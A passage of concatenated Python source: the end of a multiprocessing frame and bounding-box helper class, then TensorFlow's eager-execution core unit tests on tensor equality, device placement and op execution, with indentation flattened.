self._process.terminate()
self._process.join()
return
def StopChecking(self):
if(self._stopsignal_queue.empty()==True):
return False
else:
signal_dict=self._stopsignal_queue.get()
return signal_dict.get("STOP_SIGNAL",False)
def GetFrame(self):
frame=self._process2self_queue.get()["FRAME"]
self._process2self_queue.put({"FRAME":frame})
return frame
def UpdateBboxes(self,bboxes):
self._self2process_queue.put({"BBOXES":bboxes})
return
def IsAlive(self):
return self._process.is_alive()
|
core_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for core."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import pickle
import threading
import numpy as np
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.compat import compat
from tensorflow.python.eager import context
from tensorflow.python.eager import core
from tensorflow.python.eager import def_function
from tensorflow.python.eager import execute as execute_lib
from tensorflow.python.eager import executor
from tensorflow.python.eager import test
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_resource_variable_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import variables
def execute(op_name, num_outputs, inputs, attrs=None):
return execute_lib.execute(
op_name, num_outputs, inputs, attrs, context.context())
def truncated_normal(shape):
return execute(
b'TruncatedNormal',
1,
inputs=[shape],
attrs=('dtype', dtypes.float32.as_datatype_enum, 'T',
shape.dtype.as_datatype_enum, 'seed', 0, 'seed2', 0))[0]
def current_device():
return constant_op.constant(1.).device
def configure_virtual_cpus():
cpus = config.list_physical_devices('CPU')
# Set 2 virtual CPUs
config.set_virtual_device_configuration(cpus[0], [
context.VirtualDeviceConfiguration(),
context.VirtualDeviceConfiguration()
])
class TFETest(test_util.TensorFlowTestCase):
def setUp(self):
super(TFETest, self).setUp()
configure_virtual_cpus()
def _test_hashable(self, a, b, hashable):
if hashable:
self.assertIsInstance(b, collections.Hashable)
self.assertLen(set([a, b]), 2)
else:
# TODO(gjn): Figure out how to make this work for tf.Tensor
# self.assertNotIsInstance(b, collections.Hashable)
with self.assertRaisesRegexp(TypeError, 'unhashable'):
set([a, b])
def testEquality(self):
default = ops.Tensor._USE_EQUALITY
try:
def _v1_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, 1.0)
self.assertIsNot(a, 1.0)
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
def _v2_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertEqual(a, 1.0)
self.assertIsNot(a, 1.0)
self.assertEqual(a, b)
self.assertIsNot(a, b)
constant_a = constant_op.constant(1.0)
constant_b = constant_op.constant(1.0)
ops.disable_tensor_equality()
self._test_hashable(constant_a, constant_b, True)
_v1_check(constant_a, constant_b)
ops.enable_tensor_equality()
_v2_check(constant_a, constant_b)
self._test_hashable(constant_a, constant_b, False)
variable_a = variables.Variable(1.0)
variable_b = variables.Variable(1.0)
ops.disable_tensor_equality()
_v1_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
ops.enable_tensor_equality()
_v2_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, False)
# We only test numpy behaviour in v2 mode since we'd like to match that.
numpy_a = np.array(1.0)
numpy_b = np.array(1.0)
_v2_check(numpy_a, numpy_b)
self._test_hashable(numpy_a, numpy_b, False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityNan(self):
default = ops.Tensor._USE_EQUALITY
try:
def _v1_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, float('nan'))
self.assertIsNot(a, float('nan'))
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
def _v2_check(a, b):
self.assertNotEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, float('nan'))
self.assertIsNot(a, float('nan'))
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
constant_a = constant_op.constant(float('nan'))
constant_b = constant_op.constant(float('nan'))
ops.disable_tensor_equality()
self._test_hashable(constant_a, constant_b, True)
_v1_check(constant_a, constant_b)
ops.enable_tensor_equality()
_v2_check(constant_a, constant_b)
self._test_hashable(constant_a, constant_b, False)
variable_a = variables.Variable(float('nan'))
variable_b = variables.Variable(float('nan'))
ops.disable_tensor_equality()
_v1_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
ops.enable_tensor_equality()
_v2_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, False)
numpy_a = np.array(float('nan'))
numpy_b = np.array(float('nan'))
_v2_check(numpy_a, numpy_b)
self._test_hashable(numpy_a, numpy_b, False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityCompare(self):
default = ops.Tensor._USE_EQUALITY
try:
tf_a = constant_op.constant([1, 2])
tf_b = constant_op.constant([1, 2])
tf_c = constant_op.constant([1, 1])
np_a = np.array([1, 2])
np_b = np.array([1, 2])
np_c = np.array([1, 1])
ops.disable_tensor_equality()
# We don't do element-wise comparison
self.assertNotEqual(tf_a, tf_b)
self.assertNotEqual(tf_a, tf_c)
# We can compare list of tensors
self.assertEqual([tf_a, tf_b], [tf_a, tf_b])
self.assertNotEqual([tf_a, tf_b], [tf_b, tf_b])
# We can compare existence in a list
self.assertIn(tf_a, [tf_a, tf_b])
self.assertIn(tf_a, [tf_b, tf_a])
self.assertNotIn(tf_a, [tf_b, tf_c])
ops.enable_tensor_equality()
# We do element-wise comparison but can't convert results array to bool
with self.assertRaises(ValueError):
bool(tf_a == tf_b)
self.assertAllEqual(tf_a == tf_b, [True, True])
with self.assertRaises(ValueError):
bool(tf_a == tf_c)
self.assertAllEqual(tf_a == tf_c, [True, False])
self.assertNotAllEqual(tf_a, tf_c)
with self.assertRaises(ValueError):
bool(np_a == np_b)
self.assertAllEqual(np_a == np_b, [True, True])
with self.assertRaises(ValueError):
bool(np_a == np_c)
self.assertAllEqual(np_a == np_c, [True, False])
self.assertNotAllEqual(np_a, np_c)
# Warning even though we technically shouldn't be able to compare here,
# since the id is the same both TF & numpy will handle lists with the same
# value without raising an error
self.assertEqual([tf_a, tf_b], [tf_a, tf_b])
with self.assertRaises(ValueError):
bool([tf_a, tf_b] == [tf_b, tf_b])
self.assertEqual([np_a, np_b], [np_a, np_b])
with self.assertRaises(ValueError):
bool([np_a, np_b] == [np_b, np_b])
# Similar to lists we shouldn't be able to do a `in` check such as
# `if a in [a,b]`. However if `a` is the first element, it works due to
# short circuiting
self.assertIn(tf_a, [tf_a, tf_b])
with self.assertRaises(ValueError):
bool(tf_a in [tf_b, tf_a])
with self.assertRaises(ValueError):
bool(tf_a in [tf_b, tf_c])
self.assertIn(np_a, [np_a, np_b])
with self.assertRaises(ValueError):
bool(np_a in [np_b, np_a])
with self.assertRaises(ValueError):
bool(np_a in [np_b, np_c])
# rank 0
self.assertAllEqual(
constant_op.constant(1) == constant_op.constant(1), True)
self.assertAllEqual(
constant_op.constant(1) == constant_op.constant(2), False)
self.assertAllEqual(np.array(1) == np.array(1), True)
self.assertAllEqual(np.array(1) == np.array(2), False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityBroadcast(self):
default = ops.Tensor._USE_EQUALITY
try:
tf_a = constant_op.constant([1, 1])
tf_b = constant_op.constant([1, 1])
tf_c = constant_op.constant([[1, 1], [1, 1]])
tf_d = constant_op.constant([[1, 2], [1, 2]])
tf_e = constant_op.constant([1, 1, 1])
np_a = np.array([1, 1])
np_b = np.array([1, 1])
np_c = np.array([[1, 1], [1, 1]])
np_d = np.array([[1, 2], [1, 2]])
np_e = np.array([1, 1, 1])
ops.disable_tensor_equality()
# We don't do element-wise comparison
self.assertNotEqual(tf_a, tf_b)
self.assertNotEqual(tf_a, tf_c)
self.assertNotEqual(tf_a, tf_d)
ops.enable_tensor_equality()
# We do element-wise comparison but can't convert results array to bool
with self.assertRaises(ValueError):
bool(tf_a == tf_b)
self.assertAllEqual(tf_a == tf_b, [True, True])
with self.assertRaises(ValueError):
bool(tf_a == tf_c)
self.assertAllEqual(tf_a == tf_c, [[True, True], [True, True]])
with self.assertRaises(ValueError):
bool(tf_a == tf_d)
self.assertAllEqual(tf_a == tf_d, [[True, False], [True, False]])
if compat.forward_compatible(2019, 9, 25):
self.assertFalse(bool(tf_a == tf_e))
self.assertTrue(bool(tf_a != tf_e))
self.assertNotAllEqual(tf_a, tf_e)
else:
with self.assertRaises(errors.InvalidArgumentError):
bool(tf_a != tf_e)
with self.assertRaises(ValueError):
bool(np_a == np_b)
self.assertAllEqual(np_a == np_b, [True, True])
with self.assertRaises(ValueError):
bool(np_a == np_c)
self.assertAllEqual(np_a == np_c, [[True, True], [True, True]])
self.assertAllEqual(np_a == np_d, [[True, False], [True, False]])
self.assertFalse(bool(np_a == np_e))
self.assertTrue(bool(np_a != np_e))
self.assertNotAllEqual(np_a, np_e)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testContext(self):
ctx = context.Context()
self.assertTrue(ctx.executing_eagerly())
self.assertEqual('', ctx.scope_name)
ctx.scope_name = 'foo'
self.assertEqual('foo', ctx.scope_name)
self.assertEqual(context.SYNC, ctx.execution_mode)
ctx.execution_mode = context.ASYNC
self.assertEqual(context.ASYNC, ctx.execution_mode)
ctx.execution_mode = context.SYNC
self.assertEqual(context.SYNC, ctx.execution_mode)
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('GPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(None):
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('CPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(ctx.list_logical_devices('CPU')[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
gpus = ctx.list_logical_devices('GPU')
if gpus:
with ctx.device(gpus[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def testDevice_supportsLogicalDevice(self):
ctx = context.Context()
cpus = ctx.list_logical_devices('CPU')
with ctx.device(cpus[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
def testDevice_supportsDeviceSpec(self):
ctx = context.Context()
device_name = '/job:localhost/replica:0/task:0/device:CPU:0'
device_spec = pydev.DeviceSpec.from_string(device_name)
with ctx.device(device_spec):
self.assertEqual(device_name, ctx.device_name)
def testAsyncBasic(self):
ctx = context.Context(execution_mode=context.ASYNC)
ctx.ensure_initialized()
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def testMultiCpuPlacement(self):
with ops.device('cpu:1'):
x = constant_op.constant(1.0)
y = array_ops.identity(x)
self.assertEqual(x.device, '/job:localhost/replica:0/task:0/device:CPU:1')
self.assertEqual(y.device, '/job:localhost/replica:0/task:0/device:CPU:0')
@test_util.run_gpu_only
def testShouldCopy(self):
with ops.device('gpu:0'):
x = constant_op.constant(1.0)
y = array_ops.identity(x)
# The value we're testing y.device against will depend on what the behavior
# of not explicitly specifying a device in the context is. This behavior is
# subject to change (for example, in the future we may want to use GPUs, if
# available, when no device is explicitly provided)
self.assertEqual(y.device, '/job:localhost/replica:0/task:0/device:CPU:0')
def testContextSwitchStackContainsEagerMode(self):
# Eager execution has been enabled, and no other context switch has
# occurred, so `context_switches` should contain exactly one entry.
self.assertEqual(len(context.context().context_switches.stack), 1)
switch = context.context().context_switches.stack[0]
# The entry should log that eager mode was entered.
self.assertIs(switch.enter_context_fn, context.eager_mode)
# It is not possible to build a graph function when eager execution
# is enabled; the stack entry should reflect this fact.
self.assertFalse(switch.is_building_function)
@test_util.run_gpu_only
def testInt32GPU(self):
with ops.device('gpu:0'):
xent = nn_ops.sparse_softmax_cross_entropy_with_logits(
logits=[[0.0, 0.0]], labels=[0])
self.assertAllClose(xent, [0.69314718])
def _runInThread(self, target, args):
t = threading.Thread(target=target, args=args)
try:
t.start()
t.join()
except Exception as e:
raise e
# Test that different thread local values are initialized to the same values
# in different threads.
def testContextThreadLocalMembers(self):
def get_context_values(ctx):
return [
ctx.executing_eagerly(),
ctx.scope_name,
ctx.device_name,
ctx.num_gpus()
]
def get_values(ctx, values):
values.extend(get_context_values(ctx))
context_values = []
ctx = context.Context()
self._runInThread(get_values, (ctx, context_values))
self.assertAllEqual(context_values, get_context_values(ctx))
@test_util.run_gpu_only
def testContextConfig(self):
ctx = context.Context(config=config_pb2.ConfigProto(
device_count={'GPU': 0}))
self.assertEquals(0, ctx.num_gpus())
def testPickle(self):
tmp_dir = self.get_temp_dir()
fname = os.path.join(tmp_dir, 't.pickle')
with open(fname, 'wb') as f:
t = constant_op.constant(10.0)
pickle.dump(t, f)
with open(fname, 'rb') as f:
t = pickle.load(f)
self.assertAllEqual(t.numpy(), 10.0)
@test_util.run_gpu_only
def testDevicePlacementEnforcesConsistency(self):
cpu = context.device('cpu:0')
gpu = context.device('gpu:0')
cpu.__enter__()
self.assertEndsWith(current_device(), 'CPU:0')
gpu.__enter__()
self.assertEndsWith(current_device(), 'GPU:0')
with self.assertRaisesRegexp(
RuntimeError, 'Exiting device scope without proper scope nesting'):
cpu.__exit__()
self.assertEndsWith(current_device(), 'GPU:0')
gpu.__exit__()
self.assertEndsWith(current_device(), 'CPU:0')
@test_util.run_gpu_only
def testReEntrant(self):
cpu = context.device('cpu:0')
gpu = context.device('gpu:0')
with cpu:
with gpu:
with gpu:
self.assertEndsWith(current_device(), 'GPU:0')
self.assertEndsWith(current_device(), 'GPU:0')
self.assertEndsWith(current_device(), 'CPU:0')
with gpu:
self.assertEndsWith(current_device(), 'GPU:0')
@test_util.run_gpu_only
def testTensorPlacement(self):
x = constant_op.constant(1.).gpu()
with context.device('gpu:0'):
y = constant_op.constant(2.)
# Add would fail if t2 were not on GPU
result = execute(
b'Add', 1, inputs=[x, y],
attrs=('T', x.dtype.as_datatype_enum))[0].cpu().numpy()
self.assertEqual(3, result)
@test_util.run_gpu_only
def testResourceTensorPlacement(self):
with context.device('gpu:0'):
v = resource_variable_ops.ResourceVariable(1.0)
with context.device('cpu:0'):
# Check that even though we specified the cpu device we'll run the read op
# in the device where the handle is.
self.assertAllEqual(
gen_resource_variable_ops.read_variable_op(v.handle, v.dtype), 1.0)
@test_util.run_gpu_only
def testCopyBetweenDevices(self):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
@test_util.run_gpu_only
def testCopyBetweenDevicesAsync(self):
with context.execution_mode(context.ASYNC):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
context.context().executor.wait()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
context.context().executor.wait()
context.context().executor.clear_error()
@test_util.run_gpu_only
def testCopyScope(self):
constant = constant_op.constant(1.0)
with ops.device('gpu:0'):
with context.device_policy(context.DEVICE_PLACEMENT_SILENT):
c = constant + 1.0
self.assertAllEqual(c, 2.0)
def testPyFunctionNullContext(self):
def simple_fn(unused_handle):
return 1.
@def_function.function
def test_fn(v):
script_ops.eager_py_func(simple_fn, [v.handle], dtypes.float32)
return 1.
test_var = variables.Variable([2., 3.])
self.assertAllEqual(test_fn(test_var), 1.0)
def testPyFunctionAsync(self):
def simple_fn(v):
one = constant_op.constant(1.)
return v + one
@def_function.function
def test_fn(v):
return script_ops.eager_py_func(simple_fn, [v], dtypes.float32)
async_executor = executor.new_executor(enable_async=True)
with context.executor_scope(async_executor):
test_var = variables.Variable(2.)
self.assertAllEqual(test_fn(test_var), 3.0)
async_executor.wait()
@test_util.run_gpu_only
def testNumpyForceCPU(self):
cpu = constant_op.constant([[1., 2.], [3., 4.]])
c2g = cpu.gpu()
self.assertAllEqual(c2g, cpu.numpy())
def testCopyFromCPUToCPU(self):
ta = constant_op.constant([[1, 2], [3, 4]])
tb = ta.cpu()
self.assertNotEqual(id(ta), id(tb))
self.assertAllEqual(ta, tb.numpy())
def testRegisterExceptionClass(self):
with self.assertRaises(TypeError):
pywrap_tensorflow.TFE_Py_RegisterExceptionClass(str)
pywrap_tensorflow.TFE_Py_RegisterExceptionClass(core._NotOkStatusException) # pylint: disable=protected-access
# TODO(agarwal): add tests passing incorrect typed values to attrs.
def testExecuteBasic(self):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
def testExecuteBasicAsync(self):
with context.execution_mode(context.ASYNC):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
# Error: Invalid arguments
context.set_execution_mode(context.ASYNC)
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))
context.context().executor.wait()
context.context().executor.clear_error()
context.context().execution_mode = context.SYNC
def testExecuteTooManyNumOutputs(self):
# num_outputs provided is 50, but only one output is produced.
product = execute(
b'Mul',
num_outputs=50,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual(15, product)
def testExecuteTooFewNumOutputs(self):
# num_outputs provided is 0, but one output is produced.
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'Mul',
num_outputs=0,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
@test_util.run_gpu_only
def testMatMulGPU(self):
three = constant_op.constant([[3.]]).gpu()
five = constant_op.constant([[5.]]).gpu()
product = execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))[0]
self.assertAllEqual([[15.0]], product)
def testExecuteStringAttr(self):
checked_three = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 'just checking', 'T',
dtypes.float32.as_datatype_enum))[0]
self.assertEqual([[3]], checked_three.numpy())
def testExecuteStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 1, 'T', dtypes.float32.as_datatype_enum))
def testExecuteFloatAttr(self):
almost_equal = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', 0.3, 'T', dtypes.float32.as_datatype_enum))[0]
self.assertTrue(almost_equal)
def testExecuteFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', '0.3', 'T', dtypes.float32.as_datatype_enum))
def testExecuteIntAttr(self):
total = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', 2))[0]
self.assertAllEqual(7, total)
def testExecuteIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', '2'))
# Looks like we don't have an existing op with list(bool) attrs.
def testExecuteBoolAttr(self):
product = execute(
b'MatMul',
num_outputs=1,
inputs=[constant_op.constant([[3]]),
constant_op.constant([[5]])],
attrs=('transpose_a', True, 'transpose_b', False, 'T',
dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual([[15]], product)
def testExecuteShapeAttr(self):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', [1, 2], 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', 1, 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteListStringAttr(self):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description',
'tensor_summary', 'labels', ['3',
'summary'], 'display_name', 'test'))
def testExecuteListStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', 3, 'display_name', 'test'))
def testExecuteListStringAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', [3], 'display_name', 'test'))
def testExecuteListFloatAttr(self):
b = execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', [4.0,
6.0]))[0]
self.assertAllEqual([0, 1, 2], b)
def testExecuteListFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', 4.0))
def testExecuteListFloatAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries',
['4.0', '6.0']))
def testExecuteListIntAttr(self):
b = execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', [0, 2]))[0]
self.assertAllEqual([3], b)
def testExecuteListIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', 0))
def testExecuteListIntAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims',
['0', '2']))
def testExecuteListTypeListShapeAttr(self):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', dtypes.float64.as_datatype_enum, 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', '1', 'shapes', [[1, 2]], 'capacity', -1,
'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1, 2], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteMultipleOutputs(self):
split_dim = 1
value = [[0, 1, 2], [3, 4, 5]]
x1, x2, x3 = execute(
b'Split',
num_outputs=3,
inputs=[constant_op.constant(split_dim),
constant_op.constant(value)],
attrs=('num_split', 3, 'T', dtypes.int32.as_datatype_enum))
self.assertAllEqual([[0], [3]], x1)
self.assertAllEqual([[1], [4]], x2)
self.assertAllEqual([[2], [5]], x3)
def testExecuteBadNumOutputsArgument(self):
with self.assertRaises(TypeError):
execute(
b'Relu', [],
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum))
def testExecuteUnknownOp(self):
with self.assertRaises(errors.NotFoundError):
execute(b'BlahBlahBlah', num_outputs=1, inputs=[], attrs=None)
def testExecuteUnknownAttr(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Identity',
num_outputs=1,
inputs=[constant_op.constant(3)],
attrs=('T', dtypes.int32.as_datatype_enum, 'unknown_attr', 'blah'))
def testComposition(self):
def add(x, y):
return execute(
b'Add',
num_outputs=1,
inputs=[x, y],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
x = constant_op.constant(1)
three_x = add(add(x, x), x)
self.assertEquals(dtypes.int32, three_x.dtype)
self.assertAllEqual(3, three_x)
@test_util.run_gpu_only
def testOperationWithNoInputsRunsOnDevice(self):
shape = constant_op.constant([], dtype=dtypes.int32)
# x: Run the "TruncatedNormal" op CPU and copy result to GPU.
x = truncated_normal(shape).gpu()
# y: Explicitly run the "TruncatedNormal" op on GPU.
with context.device('gpu:0'):
y = truncated_normal(shape)
# Add would fail if x and y were not on the same device.
execute(
b'Add', 1, inputs=[x, y], attrs=('T', x.dtype.as_datatype_enum))
def testInvalidDevice(self):
with self.assertRaises(ValueError):
with context.device('pu:0'):
_ = constant_op.constant(1)
def testConvertMixedEagerTensors(self):
array = np.zeros((), dtype=np.float32)
tensor = constant_op.constant(0., dtype=dtypes.float32)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
[array, tensor], context.context())
for typ, t in zip(types, tensors):
self.assertEquals(typ, dtypes.float32)
self.assertIsInstance(t, ops.EagerTensor)
def testConvertMixedEagerTensorsWithVariables(self):
var = resource_variable_ops.ResourceVariable(1.0)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
['foo', var], context.context())
self.assertAllEqual([dtypes.string, dtypes.float32], types)
for t in tensors:
self.assertIsInstance(t, ops.EagerTensor)
# TODO(b/123637108): re-enable
@test_util.run_gpu_only
def disabled_testSmallIntegerOpsForcedToCPU(self):
a = constant_op.constant((1, 2, 3, 4, 5), dtype=dtypes.int64)
b = constant_op.constant((2, 3, 4, 5, 6), dtype=dtypes.int64)
with context.device('gpu:0'):
c = a + b
# Op forced to CPU since all constants are integers and small.
self.assertEqual(c.device, '/job:localhost/replica:0/task:0/device:CPU:0')
a = array_ops.zeros((8, 10), dtype=dtypes.int64)
b = array_ops.ones((8, 10), dtype=dtypes.int64)
with context.device('gpu:0'):
c = a + b
# Op not forced to CPU since the tensors are larger than 64 elements.
self.assertEqual(c.device, '/job:localhost/replica:0/task:0/device:GPU:0')
a = constant_op.constant((1, 2, 3, 4, 5), dtype=dtypes.float32)
b = constant_op.constant((2, 3, 4, 5, 6), dtype=dtypes.float32)
with context.device('gpu:0'):
c = a + b
# Op not forced to CPU since the constants are not integers.
self.assertEqual(c.device, '/job:localhost/replica:0/task:0/device:GPU:0')
def testExecutionModeIsStoredThreadLocal(self):
cv = threading.Condition()
count = [0]
num_threads = 10
def execution_mode_test(cond, count, num_threads, ctx, mode):
cond.acquire()
# Ensure that all threads set their mode simultaneously
# Note that this is not a simple assignment, as the execution_mode is an
# @property with a custom setter.
ctx.execution_mode = mode
count[0] = count[0] + 1
if count[0] < num_threads:
cond.wait()
else:
cond.notify_all()
cond.release()
self.assertEqual(ctx.execution_mode, mode)
ctx = context.Context()
threads = []
for i in range(num_threads):
t = threading.Thread(
target=execution_mode_test,
args=(cv, count, num_threads, ctx,
context.SYNC if i % 2 == 0 else context.ASYNC))
t.start()
threads.append(t)
for t in threads:
t.join()
class SendRecvTest(test_util.TensorFlowTestCase):
cpu_device = '/job:localhost/replica:0/task:0/device:CPU:0'
def _send(self, tensor, tensor_name, to_device):
return execute(
b'_Send', num_outputs=0, inputs=[tensor],
attrs=('T', tensor.dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', tensor.device,
'send_device_incarnation', 0,
'recv_device', to_device,
'client_terminated', True))
